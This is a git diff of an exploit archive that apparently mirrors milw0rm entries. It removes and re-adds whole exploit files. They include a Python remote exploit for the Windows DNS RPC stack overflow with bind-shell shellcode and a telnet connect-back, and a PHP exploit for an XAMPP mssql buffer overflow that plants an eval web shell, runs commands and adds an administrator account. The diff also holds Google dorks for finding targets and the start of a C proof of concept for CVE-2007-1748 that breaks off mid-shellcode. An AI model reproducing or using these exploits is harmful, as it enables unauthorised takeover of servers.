-shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56"
-shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22"
-shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30"
-shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81"
-shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42"
-shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22"
-shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9"
-shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79"
-shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab"
-shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa"
-shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48"
-shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1"
-shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0"
-shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe"
-shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9"
-shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84"
-shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56"
-shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8"
-shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79"
-shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
-shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"
-
-# Stub sections taken from metasploit 
-stub  = '\xd2\x5f\xab\xdb\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00'
-stub += '\x70\x00\x00\x00\x00\x00\x00\x00\x1f\x38\x8a\x9f\x12\x05\x00\x00'
-stub += '\x00\x00\x00\x00\x12\x05\x00\x00'
-stub += '\\A' * 465
-# At the time of overflow ESP points into our buffer which has each char 
-# prepended by a '\' and our shellcode code is about 24+ bytes away from 
-# where EDX points
-stub += '\\\x80\\\x62\\\xE1\\\x77'#Address of jmp esp from user32.dll
-# The following B's which in assembly translates to 'inc EDX' increments
-# about 31 times EDX so that it points into our shellcode 
-stub += '\\B' * 43 
-# Translates to 'jmp EDX'
-stub += '\\\xff\\\xe2'
-stub += '\\A' * 134 
-stub += '\x00\x00\x00\x00\x76\xcf\x80\xfd\x03\x00\x00\x00\x00\x00\x00\x00'
-stub += '\x03\x00\x00\x00\x47\x00\x00\x00'
-stub += shellcode
-
-# Code ripped from core security document on impacket
-# www.coresecurity.com/files/attachments/impacketv0.9.6.0.pdf 
-# Not a neat way to discover a dynamic port :-)
-def DiscoverDNSport(target):
-	trans = transport.SMBTransport(target, 139, 'epmapper')
-	trans.connect()
-	dce = dcerpc.DCERPC_v5(trans)
-	dce.bind(uuid.uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA','3.0')))
-	pm = epm.DCERPCEpm(dce)
-	handle = '\x00'*20
-	while 1:
-		dump = pm.portmap_dump(handle)
-		if not dump.get_entries_num():
-			break
-		handle = dump.get_handle()
-		entry = dump.get_entry().get_entry()
-		if(uuid.bin_to_string(entry.get_uuid()) == '50ABC2A4-574D-40B3-9D66-EE4FD5FBA076'):
-			port = entry.get_string_binding().split('[')[1][:-1]
-			return int(port)
-
-	print '[-] Could not locate DNS port; Target might not be running DNS'
-
-def ExploitDNS(target, port):
-	trans = transport.TCPTransport(target, port)
-	trans.connect()
-	dce = dcerpc.DCERPC_v5(trans)
-	dce.bind(uuid.uuidtup_to_bin(('50abc2a4-574d-40b3-9d66-ee4fd5fba076','5.0')))	
-	
-	dce.call(0x01, stub)
-
-def ConnectRemoteShell(target):
-	connect = "/usr/bin/telnet " + target + " 4444"
-	os.system(connect)
-
-if __name__ == '__main__':
-	try:
-		target = sys.argv[1]
-	except IndexError:
-		print 'Usage: %s ' % sys.argv[0]
-		sys.exit(-1)
-
-	print '[+] Locating DNS RPC port'
-	port = DiscoverDNSport(target)
-	print '[+] Located DNS RPC service on TCP port: %d' % port
-	ExploitDNS(target, port)
-	print '[+] Exploit sent. Connecting to shell in 3 seconds'
-	time.sleep(3)
-	ConnectRemoteShell(target)	
-
-# milw0rm.com [2007-04-15]
+#!/usr/bin/python
+# Remote exploit for the 0day Windows DNS RPC service vulnerability as
+# described in http://www.securityfocus.com/bid/23470/info. Tested on
+# Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444
+# and then connects to it.
+#
+# Cheers to metasploit for the first exploit.
+# Written for educational and testing purposes.
+# Author shall bear no responsibility for any damage caused by using this code
+# Winny Thomas :-)
+
+import os
+import sys
+import time
+from impacket.dcerpc import transport, dcerpc, epm
+from impacket import uuid
+
+#Portbind shellcode from metasploit; Binds port to TCP port 4444
+shellcode  = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
+shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56"
+shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22"
+shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30"
+shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81"
+shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42"
+shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22"
+shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9"
+shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79"
+shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab"
+shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa"
+shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48"
+shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1"
+shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0"
+shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe"
+shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9"
+shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84"
+shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56"
+shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8"
+shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79"
+shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
+shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"
+
+# Stub sections taken from metasploit 
+stub  = '\xd2\x5f\xab\xdb\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00'
+stub += '\x70\x00\x00\x00\x00\x00\x00\x00\x1f\x38\x8a\x9f\x12\x05\x00\x00'
+stub += '\x00\x00\x00\x00\x12\x05\x00\x00'
+stub += '\\A' * 465
+# At the time of overflow ESP points into our buffer which has each char 
+# prepended by a '\' and our shellcode code is about 24+ bytes away from 
+# where EDX points
+stub += '\\\x80\\\x62\\\xE1\\\x77'#Address of jmp esp from user32.dll
+# The following B's which in assembly translates to 'inc EDX' increments
+# about 31 times EDX so that it points into our shellcode 
+stub += '\\B' * 43 
+# Translates to 'jmp EDX'
+stub += '\\\xff\\\xe2'
+stub += '\\A' * 134 
+stub += '\x00\x00\x00\x00\x76\xcf\x80\xfd\x03\x00\x00\x00\x00\x00\x00\x00'
+stub += '\x03\x00\x00\x00\x47\x00\x00\x00'
+stub += shellcode
+
+# Code ripped from core security document on impacket
+# www.coresecurity.com/files/attachments/impacketv0.9.6.0.pdf 
+# Not a neat way to discover a dynamic port :-)
+def DiscoverDNSport(target):
+	trans = transport.SMBTransport(target, 139, 'epmapper')
+	trans.connect()
+	dce = dcerpc.DCERPC_v5(trans)
+	dce.bind(uuid.uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA','3.0')))
+	pm = epm.DCERPCEpm(dce)
+	handle = '\x00'*20
+	while 1:
+		dump = pm.portmap_dump(handle)
+		if not dump.get_entries_num():
+			break
+		handle = dump.get_handle()
+		entry = dump.get_entry().get_entry()
+		if(uuid.bin_to_string(entry.get_uuid()) == '50ABC2A4-574D-40B3-9D66-EE4FD5FBA076'):
+			port = entry.get_string_binding().split('[')[1][:-1]
+			return int(port)
+
+	print '[-] Could not locate DNS port; Target might not be running DNS'
+
+def ExploitDNS(target, port):
+	trans = transport.TCPTransport(target, port)
+	trans.connect()
+	dce = dcerpc.DCERPC_v5(trans)
+	dce.bind(uuid.uuidtup_to_bin(('50abc2a4-574d-40b3-9d66-ee4fd5fba076','5.0')))	
+	
+	dce.call(0x01, stub)
+
+def ConnectRemoteShell(target):
+	connect = "/usr/bin/telnet " + target + " 4444"
+	os.system(connect)
+
+if __name__ == '__main__':
+	try:
+		target = sys.argv[1]
+	except IndexError:
+		print 'Usage: %s ' % sys.argv[0]
+		sys.exit(-1)
+
+	print '[+] Locating DNS RPC port'
+	port = DiscoverDNSport(target)
+	print '[+] Located DNS RPC service on TCP port: %d' % port
+	ExploitDNS(target, port)
+	print '[+] Exploit sent. Connecting to shell in 3 seconds'
+	time.sleep(3)
+	ConnectRemoteShell(target)	
+
+# milw0rm.com [2007-04-15]
diff --git a/platforms/windows/remote/3738.php b/platforms/windows/remote/3738.php
index 529a9b8ed..4e1ef793d 100755
--- a/platforms/windows/remote/3738.php
+++ b/platforms/windows/remote/3738.php
@@ -1,224 +1,224 @@
-Connect($_POST['host'], $_POST['user'], $_POST['password'], $_POST['database']);
-			echo "
    DBServer: $_POST[dbserver]
    ";
-			$result = $db->Execute("SELECT * FROM $_POST[table]");
-...
-
-mssql_connect() function is vulnerable to buffer overflow and
-the host argument is totally unchecked. Also this shows a vulnerabilty in
-ADODB library (which is in the include path, inside PEAR folder) in the
-Connect method .
-
-If you say that this should be not used for production purpose or
-exposed to the outside world, try theese google dorks:
-
-intitle:XAMPP intitle:windows intitle:version
-intitle:XAMPP intitle:version intitle:1.6.0a +windows
-
-note: I could use the INTO OUTFILE method through sql injection
-to export some shell inside the /htdocs folder because we have FILE
-privilege, but we have  magic_quotes_gpc on here. This is instead
-possbile through the PhpMyAdmin default user/password.
-note ii: PHP version is 5.2.1
-note iii: bof is possible because mssql extension is enabled
-by default in php.ini
-*/
-
-if ($argc<2) {
-    print_r('
----------------------------------------------------------------------------
-Usage: php '.$argv[0].' host cmd OPTIONS
-host:      target server (ip/hostname)
-cmd:       a shell command
-Options:
- -p[port]:    specify a port other than 80
- -P[ip:port]: specify a proxy
- -S           only send the second packet
-Example:
-php '.$argv[0].' localhost VER -P1.1.1.1:80
-php '.$argv[0].' localhost NET USER sun tzu /ADD ^&^& NET LOCALGROUP
-Administrators /ADD sun -p81 -S
----------------------------------------------------------------------------
-');
-    die;
-}
-error_reporting(7);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-
-function sendpacketii($packet,$want_out)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],(int)$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($want_out){
-      if ($proxy=='') {
-        $html='';
-        while (!feof($ock)) {
-          $html.=fgets($ock);
-        }
-      }
-      else {
-        $html='';
-        while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-          $html.=fread($ock,1);
-        }
-      }
-  }
-  fclose($ock);
-}
-
-$host=$argv[1];
-$port=80;
-$proxy="";
-$cmd="";
-$send_bof=true;
-for ($i=2; $i<$argc; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p")
-and ($temp<>"-P")
-and ($temp<>"-S")
-){
-  $cmd.=" ".$argv[$i];
-}
-if ($temp=="-p")
-{
-  $port=(int)str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-if ($temp=="-S")
-{
-  $send_bof=false;
-}
-}
-if ($proxy=='') {$p="";} else {$p='http://'.$host.':'.$port;}
-
-//bad chars -> \x00,\x22,\x27,\x5c thoose affected by magic_quotes_gpc
-//102 bytes execute command one by me...
-//cmd.exe /c echo ^ > ./htdocs/xampp/s.php &
-
-if ($send_bof){
-$____scode=
-"\xeb\x13\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4a\x53".
-"\xbb\xca\x73\xe9\x77". //WinExec, kernel32.dll
-"\xff\xd3\x31\xc0\xe8\xe8\xff\xff\xff\x63\x6d\x64".
-"\x2e\x65\x78\x65\x20\x2f\x63\x20\x65\x63\x68\x6f".
-"\x20\x5e\x3c\x3f\x70\x68\x70\x20\x65\x76\x61\x6c".
-"\x28\x24\x5f\x53\x45\x52\x56\x45\x52\x5b\x48\x54".
-"\x54\x50\x5f\x43\x5d\x29\x3b\x3f\x5e\x3e\x20\x3e".
-"\x20\x2e\x2f\x68\x74\x64\x6f\x63\x73\x2f\x78\x61".
-"\x6d\x70\x70\x2f\x73\x2e\x70\x68\x70\x20\x26\x20".
-"\xff";
-
-//some junk to make this adjustable for sp4
-//eip = ecx
-$eip="\x47\x30\xE9\x77"; //0x77E93047  pop ECX - pop - retbis kernel32.dll and further ja short
-$jmp="\xeb\x8b\x90\x90"; //jmp short
-$____suntzu=str_repeat("\x90",1932-strlen($____scode)).$____scode."\x90\x90\x90\x90\x90\x90\x90\x90".$jmp.$eip;
-
-$data ="-----------------------------7d61bcd1f033e\r\n";
-$data.="Content-Disposition: form-data; name=\"dbserver\";\r\n\r\n";
-$data.="mssql\r\n";
-$data.="-----------------------------7d61bcd1f033e\r\n";
-$data.="Content-Disposition: form-data; name=\"host\";\r\n\r\n";
-$data.="$____suntzu\r\n";
-$data.="-----------------------------7d61bcd1f033e\r\n";
-$data.="Content-Disposition: form-data; name=\"adodb\";\r\n\r\n";
-$data.="submit\r\n";
-$data.="-----------------------------7d61bcd1f033e\r\n";
-$data.="Content-Disposition: form-data; name=\"user\";\r\n\r\n";
-$data.="1\r\n";
-$data.="-----------------------------7d61bcd1f033e\r\n";
-$data.="Content-Disposition: form-data; name=\"password\";\r\n\r\n";
-$data.="1\r\n";
-$data.="-----------------------------7d61bcd1f033e\r\n";
-$data.="Content-Disposition: form-data; name=\"database\";\r\n\r\n";
-$data.="1\r\n";
-$data.="-----------------------------7d61bcd1f033e--\r\n";
-$packet ="POST $p/xampp/adodb.php HTTP/1.0\r\n";
-$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet,0);
-sleep(2);
-}
-
-echo "cmd -> ".$cmd."\n";
-
-$packet ="GET $p/xampp/s.php HTTP/1.0\r\n";
-$packet.="C: error_reporting(E_ALL);set_time_limit(0);echo \"_delim_\";passthru(\$_SERVER[HTTP_CMD]);echo \"_delim_\";\r\n";
-$packet.="CMD: $cmd\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet,1);
-$out=explode("_delim_",$html);
-echo $out[1];
-?>
-
-# milw0rm.com [2007-04-15]
+Connect($_POST['host'], $_POST['user'], $_POST['password'], $_POST['database']);
+			echo "
    DBServer: $_POST[dbserver]
    ";
+			$result = $db->Execute("SELECT * FROM $_POST[table]");
+...
+
+mssql_connect() function is vulnerable to buffer overflow and
+the host argument is totally unchecked. Also this shows a vulnerabilty in
+ADODB library (which is in the include path, inside PEAR folder) in the
+Connect method .
+
+If you say that this should be not used for production purpose or
+exposed to the outside world, try theese google dorks:
+
+intitle:XAMPP intitle:windows intitle:version
+intitle:XAMPP intitle:version intitle:1.6.0a +windows
+
+note: I could use the INTO OUTFILE method through sql injection
+to export some shell inside the /htdocs folder because we have FILE
+privilege, but we have  magic_quotes_gpc on here. This is instead
+possbile through the PhpMyAdmin default user/password.
+note ii: PHP version is 5.2.1
+note iii: bof is possible because mssql extension is enabled
+by default in php.ini
+*/
+
+if ($argc<2) {
+    print_r('
+---------------------------------------------------------------------------
+Usage: php '.$argv[0].' host cmd OPTIONS
+host:      target server (ip/hostname)
+cmd:       a shell command
+Options:
+ -p[port]:    specify a port other than 80
+ -P[ip:port]: specify a proxy
+ -S           only send the second packet
+Example:
+php '.$argv[0].' localhost VER -P1.1.1.1:80
+php '.$argv[0].' localhost NET USER sun tzu /ADD ^&^& NET LOCALGROUP
+Administrators /ADD sun -p81 -S
+---------------------------------------------------------------------------
+');
+    die;
+}
+error_reporting(7);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+
+function sendpacketii($packet,$want_out)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],(int)$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($want_out){
+      if ($proxy=='') {
+        $html='';
+        while (!feof($ock)) {
+          $html.=fgets($ock);
+        }
+      }
+      else {
+        $html='';
+        while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+          $html.=fread($ock,1);
+        }
+      }
+  }
+  fclose($ock);
+}
+
+$host=$argv[1];
+$port=80;
+$proxy="";
+$cmd="";
+$send_bof=true;
+for ($i=2; $i<$argc; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p")
+and ($temp<>"-P")
+and ($temp<>"-S")
+){
+  $cmd.=" ".$argv[$i];
+}
+if ($temp=="-p")
+{
+  $port=(int)str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+if ($temp=="-S")
+{
+  $send_bof=false;
+}
+}
+if ($proxy=='') {$p="";} else {$p='http://'.$host.':'.$port;}
+
+//bad chars -> \x00,\x22,\x27,\x5c thoose affected by magic_quotes_gpc
+//102 bytes execute command one by me...
+//cmd.exe /c echo ^ > ./htdocs/xampp/s.php &
+
+if ($send_bof){
+$____scode=
+"\xeb\x13\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4a\x53".
+"\xbb\xca\x73\xe9\x77". //WinExec, kernel32.dll
+"\xff\xd3\x31\xc0\xe8\xe8\xff\xff\xff\x63\x6d\x64".
+"\x2e\x65\x78\x65\x20\x2f\x63\x20\x65\x63\x68\x6f".
+"\x20\x5e\x3c\x3f\x70\x68\x70\x20\x65\x76\x61\x6c".
+"\x28\x24\x5f\x53\x45\x52\x56\x45\x52\x5b\x48\x54".
+"\x54\x50\x5f\x43\x5d\x29\x3b\x3f\x5e\x3e\x20\x3e".
+"\x20\x2e\x2f\x68\x74\x64\x6f\x63\x73\x2f\x78\x61".
+"\x6d\x70\x70\x2f\x73\x2e\x70\x68\x70\x20\x26\x20".
+"\xff";
+
+//some junk to make this adjustable for sp4
+//eip = ecx
+$eip="\x47\x30\xE9\x77"; //0x77E93047  pop ECX - pop - retbis kernel32.dll and further ja short
+$jmp="\xeb\x8b\x90\x90"; //jmp short
+$____suntzu=str_repeat("\x90",1932-strlen($____scode)).$____scode."\x90\x90\x90\x90\x90\x90\x90\x90".$jmp.$eip;
+
+$data ="-----------------------------7d61bcd1f033e\r\n";
+$data.="Content-Disposition: form-data; name=\"dbserver\";\r\n\r\n";
+$data.="mssql\r\n";
+$data.="-----------------------------7d61bcd1f033e\r\n";
+$data.="Content-Disposition: form-data; name=\"host\";\r\n\r\n";
+$data.="$____suntzu\r\n";
+$data.="-----------------------------7d61bcd1f033e\r\n";
+$data.="Content-Disposition: form-data; name=\"adodb\";\r\n\r\n";
+$data.="submit\r\n";
+$data.="-----------------------------7d61bcd1f033e\r\n";
+$data.="Content-Disposition: form-data; name=\"user\";\r\n\r\n";
+$data.="1\r\n";
+$data.="-----------------------------7d61bcd1f033e\r\n";
+$data.="Content-Disposition: form-data; name=\"password\";\r\n\r\n";
+$data.="1\r\n";
+$data.="-----------------------------7d61bcd1f033e\r\n";
+$data.="Content-Disposition: form-data; name=\"database\";\r\n\r\n";
+$data.="1\r\n";
+$data.="-----------------------------7d61bcd1f033e--\r\n";
+$packet ="POST $p/xampp/adodb.php HTTP/1.0\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet,0);
+sleep(2);
+}
+
+echo "cmd -> ".$cmd."\n";
+
+$packet ="GET $p/xampp/s.php HTTP/1.0\r\n";
+$packet.="C: error_reporting(E_ALL);set_time_limit(0);echo \"_delim_\";passthru(\$_SERVER[HTTP_CMD]);echo \"_delim_\";\r\n";
+$packet.="CMD: $cmd\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet,1);
+$out=explode("_delim_",$html);
+echo $out[1];
+?>
+
+# milw0rm.com [2007-04-15]
diff --git a/platforms/windows/remote/3740.c b/platforms/windows/remote/3740.c
index 66fa1af72..e2f4ef221 100755
--- a/platforms/windows/remote/3740.c
+++ b/platforms/windows/remote/3740.c
@@ -1,193 +1,193 @@
-/*
-* Copyright (c) 2007 devcode
-*
-*
-*                       ^^ D E V C O D E ^^
-*
-* Windows DNS DnssrvQuery() Stack Overflow
-* [CVE-2007-1748]
-*
-*
-* Description:
-*    A vulnerability has been reported in Microsoft Windows, which can
-*    be exploited by malicious people to compromise a vulnerable system.
-*    The vulnerability is caused due to a boundary error in an RPC interface
-*    of the DNS service used for remote management of the service. This can
-*    be exploited to cause a stack-based buffer overflow via a specially
-*    crafted RPC request. The DnssrvQuery function is vulnerable to this stack
-*    overflow.
-*
-*
-* Hotfix/Patch:
-*    None as of this time.
-*
-* Vulnerable systems:
-*         Microsoft Windows 2000 Advanced Server
-*    	  Microsoft Windows 2000 Datacenter Server
-*         Microsoft Windows 2000 Server
-*         Microsoft Windows Server 2003 Datacenter Edition
-*         Microsoft Windows Server 2003 Enterprise Edition
-*         Microsoft Windows Server 2003 Standard Edition
-*         Microsoft Windows Server 2003 Web Edition
-*         Microsoft Windows Storage Server 2003
-*
-* Tested on:
-*         Microsoft Windows 2000 Advanced Server
-*
-*    This is a PoC and was created for educational purposes only. The
-*    author is not held responsible if this PoC does not work or is
-*    used for any other purposes than the one stated above.
-*
-* Notes:
-*    <3 Metasploit for releasing it yesterday, only had time to look at it
-*    this morning. Also props to Winny Thomas.
-*
-*    There are two ways we can embed shellcode. One is to pad each byte of
-*    the shellcode with '\' and jmp EBX. The other way is the one Winny used
-*    which is to pass in the shellcode as the third argument in the rpc function
-*    and jmp EDX after incrementing it appropriately. I used the latter :)
-*
-*    ^^ #pen15, InTeL, D-oNe and ps. St0n3y is nub kthxbye
-*
-*
-*/
-#include 
-#include 
-
-#pragma comment( lib, "ws2_32" )
-
-/* win32_bind -  EXITFUNC=thread LPORT=4444 Size=342 Encoder=PexFnstenvMov
-http://metasploit.com */
-unsigned char uszShellcode[] =
-       "\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x76\xd2\xab"
-       "\x1f\x83\xeb\xfc\xe2\xf4\x8a\xb8\x40\x52\x9e\x2b\x54\xe0\x89\xb2"
-       "\x20\x73\x52\xf6\x20\x5a\x4a\x59\xd7\x1a\x0e\xd3\x44\x94\x39\xca"
-       "\x20\x40\x56\xd3\x40\x56\xfd\xe6\x20\x1e\x98\xe3\x6b\x86\xda\x56"
-       "\x6b\x6b\x71\x13\x61\x12\x77\x10\x40\xeb\x4d\x86\x8f\x37\x03\x37"
-       "\x20\x40\x52\xd3\x40\x79\xfd\xde\xe0\x94\x29\xce\xaa\xf4\x75\xfe"
-       "\x20\x96\x1a\xf6\xb7\x7e\xb5\xe3\x70\x7b\xfd\x91\x9b\x94\x36\xde"
-       "\x20\x6f\x6a\x7f\x20\x5f\x7e\x8c\xc3\x91\x38\xdc\x47\x4f\x89\x04"
-       "\xcd\x4c\x10\xba\x98\x2d\x1e\xa5\xd8\x2d\x29\x86\x54\xcf\x1e\x19"
-       "\x46\xe3\x4d\x82\x54\xc9\x29\x5b\x4e\x79\xf7\x3f\xa3\x1d\x23\xb8"
-       "\xa9\xe0\xa6\xba\x72\x16\x83\x7f\xfc\xe0\xa0\x81\xf8\x4c\x25\x81"
-       "\xe8\x4c\x35\x81\x54\xcf\x10\xba\xba\x43\x10\x81\x22\xfe\xe3\xba"
-       "\x0f\x05\x06\x15\xfc\xe0\xa0\xb8\xbb\x4e\x23\x2d\x7b\x77\xd2\x7f"
-       "\x85\xf6\x21\x2d\x7d\x4c\x23\x2d\x7b\x77\x93\x9b\x2d\x56\x21\x2d"
-       "\x7d\x4f\x22\x86\xfe\xe0\xa6\x41\xc3\xf8\x0f\x14\xd2\x48\x89\x04"
-       "\xfe\xe0\xa6\xb4\xc1\x7b\x10\xba\xc8\x72\xff\x37\xc1\x4f\x2f\xfb"
